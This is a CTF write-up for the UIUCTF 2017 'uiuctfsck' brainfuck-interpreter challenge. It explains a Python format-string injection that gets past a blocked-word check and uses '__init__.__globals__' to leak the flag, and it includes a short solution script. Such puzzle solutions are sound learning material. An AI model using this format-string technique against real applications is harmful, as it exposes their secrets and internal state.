UIUCTF2017 – uiuctfsck

This was a brainfuck interpreter that let you print out some internal machine state. Notice that the interpreter does not like it if we have the string “machine” in our format string. We examine the machine object, and notice that machines[i].__init__.__globals__ had our flag, so as long as we could get our format string to contain “machine” after the check, we are in the clear. Luckily, there are 3 hex characters in “mAChinE”, so setting our data pointer to 0xAC, 0xA, 0xC, 0xE with the corresponding %x in the correct place in the format string “{machine.__init__.__globals__[flag]}” would print out the flag. The reference solution is posted below.

from interpreter import interpret_program

prog = ">"*0xac
format_attack = "{m%xhine.__init__.__globals__[flag]}"
for char in format_attack:
    prog += "+"*ord(char) + ">"
prog += "<"*len(format_attack)
prog += '.'

interpret_program(prog)
print(prog)
This entry was posted in CTF. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *